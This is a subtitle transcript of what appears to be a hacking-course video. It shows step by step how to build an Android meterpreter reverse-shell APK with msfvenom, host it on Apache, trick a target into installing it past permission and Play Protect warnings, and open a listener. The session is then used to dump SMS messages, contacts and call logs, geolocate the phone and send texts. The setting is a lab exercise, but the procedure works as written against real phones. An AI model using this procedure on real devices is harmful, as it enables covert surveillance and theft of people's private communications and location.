00:00:00,540 --> 00:01:04,290
Instructor: Welcome back. Let's hack our Android device with the help of the Android payload that we'll craft with msfvenom. So this is going to be our first attack. We're already familiar with both msfconsole and msfvenom, so we can go straight into hacking the target. Now, you might be asking why I am using zsh right here. Well, I just decided to switch the terminal a little bit, and I'm going to go and use zsh throughout this section most of the time, actually. But nonetheless, you can use the regular terminal like this. Whatever you feel like; it is exactly the same. It just looks a little bit different. But nonetheless, what is important for this attack is that you have your Kali Linux machine open and you have your Android machine open right here. So once you get both of these things open, the first thing that we want to do is, as usual, check out the IP address of our Kali Linux machine. We need the IP address in order to craft the payload. Once we check it out, in my case, it is 192.168.1.9.
00:01:04,290 --> 00:02:19,650
We want to generate the msfvenom payload for the Android device, but this is something that we haven't done before. We used meterpreter, we used the Windows reverse TCP and all of those different payloads, but we never really saw what an Android payload looks like. Well, this is the first time, and in order to craft it, let us first navigate to the desktop and run the command msfvenom -p and then the name of the payload, which is android/meterpreter/reverse_tcp. And you will already notice that this is a meterpreter payload, so we're going to get all of those cool options that we can use in post exploitation with this meterpreter Android payload. Once we set the payload, we need to set the LHOST, and in my case, that is 192.168.1.9, and the LPORT can be anything. So I'm just going to go with 5555. Once I set this, I want to output it as a file that can run on Android. Android has .apk files. Those are applications that can run on an Android device, so we must make sure that our payload has the extension .apk.
00:02:19,650 --> 00:03:37,890
We can call it, for example, shell and then .apk. This is a must. If you type something like .exe or .py, it won't work. So make sure you add .apk, and once you craft the entire command, press enter. And while this payload is being created, let's go to the second terminal. I will enter zsh and I will go and start the Apache2 web server, just so we can actually transfer the payload from our Kali Linux machine to the Android device. I'm going to enter my password right here, and once Apache2 has been started, we can go back to the first terminal. We can see the payload has been created. If I type ls, we will have it right here, which is shell.apk. And what I'm going to do right now is move that shell.apk to the /var/www/html directory on our Kali Linux machine, because that directory is the web server directory. Hmm, permission denied. That is because this directory requires root privileges, so let's just type sudo and then move it to that directory. If I go there and type ls, we're going to have our shell.apk there.
00:03:37,890 --> 00:04:46,680
Now that we have that ready, let's go and start msfconsole. While it is starting, we're going to go to our Android device, and here is where it gets a little bit tricky. As I mentioned in the theory video, there are a lot of things that the target has to do in order for this payload to be executed. The first thing that they have to do is actually visit your link where your payload is. In our case, or in my case, it is under the IP address 192.168.1.9. So I'm going to visit that payload and we're going to see this shell.apk right here. If they click on that, the download will finish and then they have to click on open. Now this can only be achieved if your target, for example, thinks that the payload is something that they want to download. In other words, if they suspect the payload is anything else but the thing that they want to download, this will most likely fail and they will never download your application and run it, especially once they reach this part right here.
00:04:46,680 --> 00:05:58,080
If they actually read what this application will be able to do, it tells us that it'll get access to modifying system settings, take pictures and videos, modify your contacts, record audio, directly call phone numbers, read call logs, read phone status and identity, and write call logs. And this is not the only thing. If we click on next, it gives us even more things that this application will be able to do, which is read your text messages, receive text messages, modify or delete contents of your SD card, and no application should be able to do all of these things. However, most of them will not read through this. They will just click on install. The application will take a few seconds to install, and it'll tell you that this app was built for an older version of Android and doesn't include the latest privacy protections. If they click on install anyway, the app will be fully installed. They might get this warning right here. It depends on the Android version. It says Play Protect hasn't seen this app before; to protect yourself and others, send it for a security scan.
00:05:58,080 --> 00:07:12,060
If they came up to this point, they will most likely not send anything for the scan and they will just run the application. But before we actually run it, we need to set up a listener inside of our msfconsole. So let's go and type use exploit/multi/handler and let's set the payload to be android/meterpreter/reverse_tcp. We need to set the LHOST to be 192.168.1.9 and set LPORT to be 5555. Once we do all of that, we can press run, and while our listener is being executed, they can run the application, and on their screen nothing will actually happen. But if we go back to our Kali Linux machine, we have meterpreter session one open, and if I type getuid, I will see what the user ID of the target is. If I type help, I will see all the available commands that I can run on the target Android device, and we can say it's not really the same as for the Windows meterpreter shell. We have a few new things such as screenshare. We have two fully new sections of commands, such as Android commands right here.
00:07:12,060 --> 00:08:20,250
Here we can use activity_start, check_root, dump_calllog, dump_contacts, dump_sms, geolocate, hide_app_icon, and many other things. We can even send SMS. However, if you try any of these commands in an actual virtual machine, of course they will not work, because we cannot send an SMS from a virtual machine. But if you were to hack an actual Android device, you can type send_sms, then -d, and as it says right here, -d specifies the destination address. In our case, that should be a phone number, so you specify the phone number that you want to send this to. It can be anything, and -t is the actual text that you want to send. It must be a text between the double quotes, and you can type anything such as "Hello World." Of course this won't work because our target is an actual virtual machine, but if you were once again to hack an actual Android device, this will send a text message to this phone number with this "Hello World" message. Cool, right? And that is just one of the commands that you can do.
00:08:20,250 --> 00:09:22,680
You can dump all of the SMS messages if you type dump_sms. This will print out all of the messages that the target has stored, so you can see what the target has talked about with other people. You can even go and try dump_contacts in order to get all of the contacts from their phone. You can dump call logs to see all the people that they actually had a voice call with. There are other cool options as well, such as wlan_geolocate, and it says "Get current lat-long using WLAN information", and this lat-long is simply just latitude and longitude. In the application controller commands, what you can do is install different applications. You can list applications. If I type app_list, for some reason this time it'll time out, but nonetheless, that could be because of this send SMS message. We're going to check out this app list in the next video once we try out a different attack. But one more thing I want to show you before I close off this video is the actual place where your application got installed.
00:09:22,680 --> 00:10:14,920
If I just close this Google Chrome first, then if you go to the applications, which you can go to by clicking on this arrow right here, you will have this MainActivity with the Android logo, and this is our payload. This is the virus that we sent to the target. In order to uninstall it, you can simply just hold onto it a little bit and then drag it to the uninstall, and this will uninstall the payload from the Android device. Just in case you're testing on a real Android device and you want to make sure that you delete it afterwards, you can do that. Nonetheless, this is our first attack on an Android device, and in the next video we're going to check out a similar attack with the Android payload just by using a different tool. And then we're also going to test out the Android application commands. See you in the next video.